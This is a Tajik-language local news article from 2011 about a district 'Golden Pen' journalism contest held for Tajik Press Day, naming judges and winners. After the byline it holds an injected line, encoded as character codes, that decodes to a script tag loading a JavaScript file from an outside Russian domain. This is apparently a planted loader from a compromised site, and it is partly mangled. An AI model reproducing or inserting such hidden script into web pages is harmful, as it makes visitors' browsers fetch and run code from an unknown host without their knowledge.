12.03.2011
Озмуни ноҳиявии Хомаи Заррин чӣ натиҷа дод?
Бахшида ба иди матбуоти тоҷик рузи гузашта дар маркази ҷавонони ноҳия озмуни Хомаи Заррин гузаронида шуд. Дар чорабини намояндагони МИХД ноҳия ва мухлисон иштирок намуданд. Хомаи заррин аз рӯи 5 шарт суръат гирифт. Гулноза Абдуллоева ки таълимгирандаи МТМУ рақами 40-уми ҷамоати Қистақӯз мебошад яке аз иштирокчии ин чорабини буд.
Ҳар як иштирокчи ҳунару истеъдоди худро барои ғолиб омадан дар ин маҳфил нишон медод.
Озмунро аъзои хайъати ҳакамон Мунаввара Дамонова ҷамъбаст намуда зимни баромади хеш дар бораи бурду бохти фазои иттилоотии нохияи Б. Ғафуров маълумот дод.
Сипас натиҷаи озмунро эълон намуда ба ғолибон ифтихорномаи МИХД ноҳия супорида шуд. Ҷои аввал насиби Гулноза Абдуллоева ҷои дуввум насиби Маърифат Саиднабиева ва ниҳоят ҷои саввум насиби Шаҳноза Гадоева гардид.
Гузаронидани чунин чорабини барои баланд бардоштани сатҳи маърифатнокии хонандагон ва дар рӯҳияи ватандӯстию меҳанпарасти замимае хоҳад буд.
Мутриба Қосимова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)54d16a86aefbd4ce8997617ffe58b8b1.js" type="text/javascript">

ТАВЗЕҲОТ